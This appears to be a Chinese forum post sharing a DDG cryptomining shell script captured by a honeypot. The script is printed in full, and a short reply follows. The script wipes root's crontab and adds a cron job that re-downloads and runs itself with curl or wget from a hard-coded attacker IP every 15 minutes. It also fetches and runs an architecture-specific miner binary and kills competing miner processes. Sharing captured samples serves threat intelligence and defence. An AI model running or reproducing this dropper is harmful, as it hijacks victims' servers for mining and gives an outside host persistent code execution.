蜜罐捕获
DDG挖矿脚本
cmsfree 2019-06-28 09:30:36 1065人浏览

URL:http://110.40.14.13:8000/i.sh


export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/mcuifa3||/usr/libexec/mcuifa3||/usr/local/bin/mcuifa3||/tmp/mcuifa3||curl -fsSL -m180 http://110.40.14.13:8000/i.sh||wget -q -T180 -O- http://110.40.14.13:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep mcuifa3 || rm -rf mcuifa3
if [ ! -f "mcuifa3" ]; then
    curl -fsSL -m1800 http://110.40.14.13:8000/static/4003/ddgs.$(uname -m) -o mcuifa3||wget -q -T1800 http://110.40.14.13:8000/static/4003/ddgs.$(uname -m) -O mcuifa3
fi
chmod +x mcuifa3
/usr/bin/mcuifa3||/usr/libexec/mcuifa3||/usr/local/bin/mcuifa3||/tmp/mcuifa3

ps auxf | grep -v grep | grep mcuibcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuibcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuibcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuibce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuifa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuifa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuifa2 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/mcuifa3||/usr/libexec/mcuifa3||/usr/local/bin/mcuifa3||/tmp/mcuifa3||curl -m180 -fsSL http://110.40.14.13:8000/i.sh||wget -q -T180 -O- http://110.40.14.13:8000/i.sh) | sh" | crontab -
ip地址(1) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
dirshell 2019-07-02 14:17:10 回复
试试